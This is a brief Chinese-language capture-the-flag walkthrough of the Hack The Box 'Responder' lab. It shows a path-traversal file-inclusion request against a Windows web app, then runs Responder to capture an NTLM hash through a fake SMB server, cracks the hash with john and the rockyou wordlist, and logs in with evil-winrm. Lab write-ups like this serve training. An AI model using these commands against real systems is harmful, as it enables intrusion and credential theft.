HTB靶场：Responder（远程包含协议&NTLM哈希破解&WinRM）

1. 拿到target IP，进行扫描

发现http服务和WinRM协议（远程管理）

2. 对http服务进行访问，发现无法访问

curl -v http://{ip}

发现类似如下内容：

原因：被重定向，且无法解析域名地址

解决：hosts上添加DNS解析

3. 发现包含漏洞点，存在本地文件包含

GET /index.php?page=../../../../../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1

Host: unika.htb

继续测试远程包含，FTP协议、SMB协议等

4. 尝试利用responder伪造成SMB服务器

responder -I tun0

5. 访问伪造的SMB服务

收到来自靶机的流量

6. 将hash值放到john上解出明文

john -w=/usr/share/wordlists/rockyou.txt hash.txt

顺手解压rouckyou.txt.gz

gzip -d rockyou.txt.gz

得到账号密码

7. 利用远程管理协议——WinRM的登录工具evil-winrm

8. 拿到flag